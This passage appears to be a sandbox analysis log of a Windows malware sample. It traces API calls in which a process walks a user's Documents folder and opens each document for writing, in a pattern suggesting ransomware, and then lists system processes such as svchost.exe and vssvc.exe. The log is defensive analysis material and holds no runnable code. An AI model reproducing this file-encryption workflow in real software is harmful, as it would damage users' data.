hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x16b7f5d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b7f5d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0074.164] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned 53 [0074.164] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0074.164] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned 53 [0074.164] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34e7a690, ftCreationTime.dwHighDateTime=0x1d58cdf, ftLastAccessTime.dwLowDateTime=0x6bd84c0, ftLastAccessTime.dwHighDateTime=0x1d53be9, ftLastWriteTime.dwLowDateTime=0x6bd84c0, ftLastWriteTime.dwHighDateTime=0x1d53be9, nFileSizeHigh=0x0, nFileSizeLow=0x10b4d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="O211aycB4UPXuVl.pptx", cAlternateFileName="O211AY~1.PPT")) returned 1 [0074.164] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O211aycB4UPXuVl.pptx") returned 64 [0074.164] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O211aycB4UPXuVl.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\o211aycb4upxuvl.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x898 [0074.164] QueueUserWorkItem (Function=0x404e00, Context=0x898, Flags=0x0) returned 1 [0074.164] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35ac970, ftCreationTime.dwHighDateTime=0x1d57f8f, ftLastAccessTime.dwLowDateTime=0x542437d0, ftLastAccessTime.dwHighDateTime=0x1d5534b, ftLastWriteTime.dwLowDateTime=0x542437d0, ftLastWriteTime.dwHighDateTime=0x1d5534b, nFileSizeHigh=0x0, nFileSizeLow=0x6f22, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OC76k.pptx", cAlternateFileName="OC76K~1.PPT")) returned 1 [0074.164] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OC76k.pptx") returned 54 [0074.164] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OC76k.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oc76k.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x89c [0074.164] QueueUserWorkItem (Function=0x404e00, Context=0x89c, Flags=0x0) returned 1 [0074.165] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x16ba5730, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ba5730, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0074.165] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned 57 [0074.165] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16ba5730, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16ba5730, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ba5730, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.165] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\read_me.txt") returned 55 [0074.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8a0 [0074.165] QueueUserWorkItem (Function=0x404e00, Context=0x8a0, Flags=0x0) returned 1 [0074.165] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc673190, ftCreationTime.dwHighDateTime=0x1d59e41, ftLastAccessTime.dwLowDateTime=0x3ea635c0, ftLastAccessTime.dwHighDateTime=0x1d57abf, ftLastWriteTime.dwLowDateTime=0x3ea635c0, ftLastWriteTime.dwHighDateTime=0x1d57abf, nFileSizeHigh=0x0, nFileSizeLow=0x122f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X8liO8z CUMPTRf.docx", cAlternateFileName="X8LIO8~1.DOC")) returned 1 [0074.165] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X8liO8z CUMPTRf.docx") returned 64 [0074.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X8liO8z CUMPTRf.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x8lio8z cumptrf.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8a4 [0074.165] QueueUserWorkItem (Function=0x404e00, Context=0x8a4, Flags=0x0) returned 1 [0074.165] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b2fe30, ftCreationTime.dwHighDateTime=0x1d55169, ftLastAccessTime.dwLowDateTime=0xadf31040, ftLastAccessTime.dwHighDateTime=0x1d553ed, ftLastWriteTime.dwLowDateTime=0xadf31040, ftLastWriteTime.dwHighDateTime=0x1d553ed, nFileSizeHigh=0x0, nFileSizeLow=0x821e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Xo5V66X1-M.pptx", cAlternateFileName="XO5V66~1.PPT")) returned 1 [0074.165] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Xo5V66X1-M.pptx") returned 59 [0074.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Xo5V66X1-M.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xo5v66x1-m.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8a8 [0074.165] QueueUserWorkItem (Function=0x404e00, Context=0x8a8, Flags=0x0) returned 1 [0074.165] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x779f1df0, ftCreationTime.dwHighDateTime=0x1d58f06, ftLastAccessTime.dwLowDateTime=0x549dca0, ftLastAccessTime.dwHighDateTime=0x1d560ed, ftLastWriteTime.dwLowDateTime=0x549dca0, ftLastWriteTime.dwHighDateTime=0x1d560ed, nFileSizeHigh=0x0, nFileSizeLow=0x7a6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZL_P.pptx", cAlternateFileName="ZL_P~1.PPT")) returned 1 [0074.165] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZL_P.pptx") returned 53 [0074.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZL_P.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zl_p.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8ac [0074.166] QueueUserWorkItem (Function=0x404e00, Context=0x8ac, Flags=0x0) returned 1 [0074.166] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x779f1df0, ftCreationTime.dwHighDateTime=0x1d58f06, ftLastAccessTime.dwLowDateTime=0x549dca0, ftLastAccessTime.dwHighDateTime=0x1d560ed, ftLastWriteTime.dwLowDateTime=0x549dca0, ftLastWriteTime.dwHighDateTime=0x1d560ed, nFileSizeHigh=0x0, nFileSizeLow=0x7a6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zl_p.pptx", cAlternateFileName="ZL_P~1.PPT")) returned 0 [0074.166] FindClose (in: hFindFile=0x2b2738 | out: hFindFile=0x2b2738) returned 1 [0074.166] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\read_me.txt") returned 55 [0074.166] GetProcessHeap () returned 0x280000 [0074.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8c21078 | out: hHeap=0x280000) returned 1 [0074.166] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 45 [0074.166] GetProcessHeap () returned 0x280000 [0074.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b30010 | out: hHeap=0x280000) returned 1 Thread: id = 7 os_tid = 0x95c Thread: id = 8 os_tid = 0x960 Thread: id = 9 os_tid = 0x964 Thread: id = 10 os_tid = 0x968 Thread: id = 24 os_tid = 0x96c Thread: id = 97 os_tid = 0x9f4 Thread: id = 111 os_tid = 0xaec Thread: id = 112 os_tid = 0xaf0 Thread: id = 113 os_tid = 0xb0c Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x15f04000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x938" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dc17" [0xc000000f], "LOCAL" [0x7] Thread: id = 11 os_tid = 0x814 Thread: id = 12 os_tid = 0x76c Thread: id = 13 os_tid = 0x758 Thread: id = 14 os_tid = 0x74c Thread: id = 15 os_tid = 0x72c Thread: id = 16 os_tid = 0x71c Thread: id = 17 os_tid = 0x718 Thread: id = 18 os_tid = 0x638 Thread: id = 19 os_tid = 0x154 Thread: id = 20 os_tid = 0x150 Thread: id = 21 os_tid = 0x12c Thread: id = 22 os_tid = 0x120 Thread: id = 23 os_tid = 0x3fc Thread: id = 98 os_tid = 0xa50 Thread: id = 124 os_tid = 0x8c8 Thread: id = 178 os_tid = 0x974 Thread: id = 186 os_tid = 0xcc Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x230f4000" os_pid = "0x36c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x938" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cedf" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 25 os_tid = 0x798 Thread: id = 26 os_tid = 0x330 Thread: id = 27 os_tid = 0x7f8 Thread: id = 28 os_tid = 0x430 Thread: id = 29 os_tid = 0x268 Thread: id = 30 os_tid = 0x768 Thread: id = 31 os_tid = 0x764 Thread: id = 32 os_tid = 0x760 Thread: id = 33 os_tid = 0x75c Thread: id = 34 os_tid = 0x70c Thread: id = 35 os_tid = 0x6e8 Thread: id = 36 os_tid = 0x6d8 Thread: id = 37 os_tid = 0x6d4 Thread: id = 38 os_tid = 0x6d0 Thread: id = 39 os_tid = 0x6c8 Thread: id = 40 os_tid = 0x6c0 Thread: id = 41 os_tid = 0x6b8 Thread: id = 42 os_tid = 0x6a8 Thread: id = 43 os_tid = 0x6a4 Thread: id = 44 os_tid = 0x6a0 Thread: id = 45 os_tid = 0x690 Thread: id = 46 os_tid = 0x67c Thread: id = 47 os_tid = 0x490 Thread: id = 48 os_tid = 0x454 Thread: id = 49 os_tid = 0x450 Thread: id = 50 os_tid = 0x428 Thread: id = 51 os_tid = 0x424 Thread: id = 52 os_tid = 0x420 Thread: id = 53 os_tid = 0x404 Thread: id = 54 os_tid = 0x18c Thread: id = 55 os_tid = 0xf0 Thread: id = 56 os_tid = 0xc8 Thread: id = 57 os_tid = 0x3f0 Thread: id = 58 os_tid = 0x3e4 Thread: id = 59 os_tid = 0x398 Thread: id = 60 os_tid = 0x394 Thread: id = 61 os_tid = 0x390 Thread: id = 62 os_tid = 0x38c Thread: id = 63 os_tid = 0x378 Thread: id = 64 os_tid = 0x370 Thread: id = 73 os_tid = 0x978 Thread: id = 74 os_tid = 0x97c Thread: id = 99 os_tid = 0xabc Thread: id = 100 os_tid = 0xac0 Thread: id = 101 os_tid = 0xac4 Thread: id = 102 os_tid = 0xacc Thread: id = 103 os_tid = 0xad0 Thread: id = 104 os_tid = 0xac8 Thread: id = 105 os_tid = 0xad4 Thread: id = 106 os_tid = 0xad8 Thread: id = 109 os_tid = 0xae4 Thread: id = 110 os_tid = 0xae8 Thread: id = 114 os_tid = 0xbf4 Thread: id = 115 os_tid = 0xbf8 Thread: id = 116 os_tid = 0xbfc Thread: id = 117 os_tid = 0x4f0 Thread: id = 118 os_tid = 0x2b0 Thread: id = 119 os_tid = 0x128 Thread: id = 120 os_tid = 0x534 Thread: id = 121 os_tid = 0x828 Thread: id = 122 os_tid = 0x7bc Thread: id = 123 os_tid = 0x734 Thread: id = 143 os_tid = 0x5d8 Thread: id = 144 os_tid = 0x5b8 Thread: id = 145 os_tid = 0x6ac Thread: id = 167 os_tid = 0x8cc Thread: id = 168 os_tid = 0x894 Thread: id = 169 os_tid = 0x8ec Thread: id = 170 os_tid = 0x8e8 Thread: id = 171 os_tid = 0x8e4 Thread: id = 172 os_tid = 0x8dc Thread: id = 175 os_tid = 0x794 Thread: id = 176 os_tid = 0x908 Process: id = "4" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x65a06000" os_pid = "0x6b4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cedf" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 65 os_tid = 0x80c Thread: id = 66 os_tid = 0x808 Thread: id = 67 os_tid = 0x804 Thread: id = 68 os_tid = 0x110 Thread: id = 69 os_tid = 0x7b8 Thread: id = 70 os_tid = 0x244 Thread: id = 71 os_tid = 0x2ac Thread: id = 72 os_tid = 0x7f0 Thread: id = 108 os_tid = 0xae0 Thread: id = 180 os_tid = 0x928 Thread: id = 188 os_tid = 0xb60 Process: id = "5" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x51814000" os_pid = "0x980" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:000513e8" [0xc000000f] Thread: id = 75 os_tid = 0x984 Thread: id = 76 os_tid = 0x988 Thread: id = 77 os_tid = 0x98c Thread: id = 78 os_tid = 0x990 Thread: id = 79 os_tid = 0x994 Thread: id = 80 os_tid = 0x998 Thread: id = 81 os_tid = 0x99c Thread: id = 107 os_tid = 0xadc Thread: id = 173 os_tid = 0x874 Thread: id = 174 os_tid = 0x884 Thread: id = 181 os_tid = 0x91c Thread: id = 187 os_tid = 0xb54 Process: id = "6" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x50f6a000" os_pid = "0x9a0" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x980" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:000517f5" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 82 os_tid = 0x9b4 Thread: id = 83 os_tid = 0x9b0 [0039.183] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xdcd990 | out: lpSystemTimeAsFileTime=0xdcd990*(dwLowDateTime=0x26bc340, dwHighDateTime=0x1d59ffe)) [0039.183] GetCurrentProcessId () returned 0x9a0 [0039.183] GetCurrentThreadId () returned 0x9b0 [0039.183] GetTickCount () returned 0x1143064 [0039.183] QueryPerformanceCounter (in: lpPerformanceCount=0xdcd998 | out: lpPerformanceCount=0xdcd998*=15932096482) returned 1 [0039.184] malloc (_Size=0x100) returned 0x1c8e80 [0088.758] free (_Block=0x1c8e80) Thread: id = 84 os_tid = 0x9ac Thread: id = 85 os_tid = 0x9a8 Thread: id = 86 os_tid = 0x9a4 Thread: id = 87 os_tid = 0x9b8 Thread: id = 88 os_tid = 0x9bc Thread: id = 89 os_tid = 0x9d8 Thread: id = 96 os_tid = 0x9f0 Thread: id = 182 os_tid = 0x8f0 Process: id = "7" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x50e6f000" os_pid = "0x9c0" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x9a0" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:00051c89" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 90 os_tid = 0x9dc Thread: id = 91 os_tid = 0x9d4 Thread: id = 92 os_tid = 0x9d0 Thread: id = 93 os_tid = 0x9cc Thread: id = 94 os_tid = 0x9c8 Thread: id = 95 os_tid = 0x9c4 Thread: id = 183 os_tid = 0x918 Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x910c000" os_pid = "0x124" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x3f8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e1c4" [0xc000000f], "LOCAL" [0x7] Thread: id = 125 os_tid = 0xa54 Thread: id = 126 os_tid = 0x8ac Thread: id = 127 os_tid = 0x858 Thread: id = 128 os_tid = 0x754 Thread: id = 129 os_tid = 0x704 Thread: id = 130 os_tid = 0x6b0 Thread: id = 131 os_tid = 0x698 Thread: id = 132 os_tid = 0x678 Thread: id = 133 os_tid = 0x630 Thread: id = 134 os_tid = 0x610 Thread: id = 135 os_tid = 0x14c Thread: id = 136 os_tid = 0x140 Thread: id = 137 os_tid = 0x158 Thread: id = 138 os_tid = 0x294 Thread: id = 139 os_tid = 0x218 Thread: id = 140 os_tid = 0x230 Thread: id = 141 os_tid = 0x21c Thread: id = 142 os_tid = 0x1c4 Thread: id = 179 os_tid = 0x92c Thread: id = 184 os_tid = 0x9e8 Process: id = "9" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x8bed000" os_pid = "0x334" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ba6f" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 146 os_tid = 0x790 Thread: id = 147 os_tid = 0x658 Thread: id = 148 os_tid = 0x584 Thread: id = 149 os_tid = 0x728 Thread: id = 150 os_tid = 0x674 Thread: id = 151 os_tid = 0x65c Thread: id = 152 os_tid = 0x144 Thread: id = 153 os_tid = 0x118 Thread: id = 154 os_tid = 0x3ec Thread: id = 155 os_tid = 0x3e8 Thread: id = 156 os_tid = 0x3e0 Thread: id = 157 os_tid = 0x3dc Thread: id = 158 os_tid = 0x3cc Thread: id = 159 os_tid = 0x3c8 Thread: id = 160 os_tid = 0x388 Thread: id = 161 os_tid = 0x384 